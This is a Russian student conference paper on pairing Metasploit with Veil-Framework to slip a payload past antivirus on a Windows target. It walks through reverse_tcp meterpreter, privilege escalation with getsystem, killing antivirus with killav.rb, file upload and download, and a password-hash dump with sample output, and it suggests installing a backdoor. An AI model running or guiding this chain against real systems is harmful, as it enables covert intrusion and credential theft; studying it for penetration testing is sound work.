ПРИМЕНЕНИЕ СВЯЗКИ METASPLOIT-VEIL ДЛЯ ОБХОДА АНТИВИРУСНОЙ ЗАЩИТЫ - Студенческий научный форум

VII Международная студенческая научная конференция Студенческий научный форум - 2015

ПРИМЕНЕНИЕ СВЯЗКИ METASPLOIT-VEIL ДЛЯ ОБХОДА АНТИВИРУСНОЙ ЗАЩИТЫ

Кошуцкий Р.А. 1
1Южный федеральный университет
 Комментарии
Текст работы размещён без изображений и формул.
Полная версия работы доступна во вкладке "Файлы работы" в формате PDF

На сегодняшний день тестирование на проникновение (penetration testing) является одним из основных сценариев анализа защищенности. Пен-тестирование включает в себя полный анализ системы путем осуществления реальных тестов безопасности. Это помогает выявлять потенциально слабые места в основных компонентах системы: аппаратном или программном обеспечении.

Тестирование на проникновение является важным аспектом безопасности, помогая в определении угроз и слабых мест с точки зрения хакера. Лазейки могут быть использованы в режиме реального времени, чтобы выяснить воздействие уязвимости, а затем подходящим средством могут быть изучены для того, чтобы защитить систему от внешних атак и снижения факторов риска. Самым большим фактором, который определяет возможность проникновения — знание целевой системы. Есть несколько способов тестирования на проникновение:

метод черного ящика — осуществляется при отсутствии предварительной информации о цели. Для осуществления атаки, пен-тестеру приходится по крупицам собирать информацию о целевой системе.

метод белого ящика - осуществляется, когда пен-тестер имеет достаточно полную информацию о цели.

Промышленные специалисты определили некоторые ключевые шаги, которые необходимы практически во всех формах тестирования на проникновение, к ним относятся:

определение цели — сбор основной информации без физического соединения.

выявление уязвимости — реализация различных методов обнаружения, таких как сканирование, удаленный вход (remote login) и сетевые сервисы, чтобы выяснить, какие службы и программное обеспечение, работают на целевой системе.

эксплуатация — использование уязвимостей (публичных или приватных) для атаки на службы, программы и т.п.

уровень доступа — атакующий может получить доступ на целевой системе после успешной атаки.

отчет — подготовка отчета об уязвимости(ях) и меры противодействия.

Этих шагов может показаться мало, но тестирование на проникновение систем высокого уровня (high-end system) с большим количеством служб может занять дни если не месяцы. Причина, по которой тестирование на проникновение выполняется так долго состоит в том, что применяется техника «проб и ошибок». Уязвимости во многом зависят от настройки системы, поэтому нельзя с полной достоверностью утверждать, что рабочий эксплоит будет работать.

Целью проведенной работы являлся обход антивирусной защиты современной системы. Для этого вначале необходимо провести «разведку», собрав данные о целевой системе. Это очень важный этап, так как впоследствии, при выборе эксплойта, атакующий будет руководствоваться данными, полученными на этапе «разведки».

Metasploit Framework – бесплатный (открытый исходный код) пен-тест framework созданный H. D. Moore в 2003 году, который в последствии был куплен Rapid7. Написан на языке Ruby. Metasploit обладает крупнейшими базами данных эксплоитов и принимает около миллиона загрузок каждый год. Он также является одн0438м из самых сложных проектов на сегодняшний, написанных на Ruby. [1]

Veil-Framework – инструмент для создания полезной нагрузки исполняемых файлов, которая помогает обойти современные антивирусные средства. [3]

После сбора сведений о целевой системе необходимо выбрать подходящий эксплойт в базе Metasploit, затем обработать его с помощью Veil-Framework. На выходе получится исполняемый файл, который нужно передать на компьютер, выбранный в качестве атакуемого. Пользователь ничего не заподозрит, так как все антивирусные средства будут опознавать этот файл, как безопасный. Единственной проблемой является то, что пользователь должен сам запустить данный файл. Чтобы после запуска он ничего не заподозрил запущенный процесс автоматически мигрирует на один из обычных системных, например, блокнот. Как только это произошло, то можно переходить к получению контроля над системой. Сюда относится повышение привилегий, желательно до административного уровня, с последующим отключением антивирусных средств.

Для этого запускается meterpreter сессия, обусловлено выбранным на этапе подготовки шеллкодом (windows/meterpreter/reverse_tcp), и вводится команда getsystem. Отключение антивирусных средств производится запуском, имеющегося в meterpreter скрипта, killav.rb. После чего просматриваем вывод команды «ps» и убеждаемся, что антивирусные процессы деактивированы. Появился полный доступ к скомпрометированной системе.

Загрузка файла на целевую машину (рис.1):

meterpreter > upload /root/Desktop/test c:

[*] uploading : /root/Desktop/test -> c:

[*] uploaded : /root/Desktop/test -> c:test

Рисунок – Загрузка файла test на целевую систему

Скачивание файл с целевой системы на собственную (рис.2):

meterpreter > download c:123.txt /root/Desktop/

[*] downloading: c:123.txt -> /root/Desktop//123.txt

[*] downloaded : c:123.txt -> /root/Desktop//123.txt

Рисунок – Скачивание файла 123.txt с целевой системы

Получение хэшей паролей из SAM-файла:

meterpreter > run hashdump

[*] Obtaining the boot key...

[*] Calculating the hboot key using SYSKEY 68e7b3fb0f024702834a0d51a6443ea0...

[*] Obtaining the user list and keys...

[*] Decrypting user keys...

[*] Dumping password hashes...

Grafik2307:500:2fb4c98e058fde462517773e5948bb2c:e52569c346ca4c019cf5b5d13ecee5d2:::

Fox:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

HelpAssistant:1000:289e29e79f2ae288349d85c47b106f2e:44776ca887488c950b67addd10762f5c:::

SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:4d079dfdb4e10635fc4bd923aa9ae6a5:::

User3:1009:73a7084f976f0ecd944e2df489a880e4:fe06591b6a5a0286fff0859ffa362c15:::

UserlS:1011:73a7084f976f0ecd944e2df489a880e4:fe06591b6a5a0286fff0859ffa362c15::

Извлекли все хэши паролей пользователей данной системы, теперь можно воспользоваться онлайн-сервисом для расшифровки. [2]

Заключение

Так как атакуемая система не будет доступна постоянно, необходимо загрузить на нее бэкдур, с помощью которого возможна установка соединения в любой момент времени.

Список дальнейших действий зависит от целей атакующего, вот некоторые из возможностей meterpreter: загрузка/скачивание файлов, получение хэшей паролей из SAM-файла, клавиатурный сниффинг, получение скриншотов целевой системы. [2]

Библиографический список

[1] [Электронный ресурс].  URL: https://community.rapid7.com/community/metasploit/blog (дата обращения: 13.01.15).

[2] Abhinav S. Metasploit Penetration Testing Cookbook/S. Abhinav - Birmingham: Packt Publishing Ltd, 2012. - 269 с.

[3] [Электронный ресурс].  URL: https://www.veil-framework.com (дата обращения: 13.01.15).

Просмотров работы: 1661